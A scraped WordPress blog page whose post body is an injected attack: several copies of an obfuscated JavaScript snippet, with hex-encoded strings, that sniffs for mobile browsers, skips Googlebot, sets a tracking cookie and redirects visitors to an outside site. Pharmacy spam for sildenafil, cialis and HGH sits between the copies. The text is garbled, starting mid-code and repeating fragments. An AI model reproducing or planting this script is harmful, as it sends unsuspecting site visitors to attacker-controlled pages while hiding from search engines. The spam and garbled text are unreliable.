)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}Sildenafil is a prescription medicine that is not legally available without a prescription. Order Sildenafil legally with an online prescription here. Order sildenafil from Superdrug – From ВЈ18 – Choose between 25mg, 50mg and 100mg tablets – Online Prescription and Delivery Included. Nonetheless, you must make certain that Tadalafil For Sale the site is approved to promote medicines in your country. Erectile dysfunction is not tadalafil for sale. Tadalafil For Sale. how to buy cialis online safely. and community-friendly environment where customers of injectable hgh. buy cialis usa..var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Written by Team in: Raid | Étiquettes :

Pas de commentaire »

RSS feed for comments on this post. TrackBack URL


Leave a Reply

Sidead Sidead

Design: TheBuckmaker.com WordPress Themes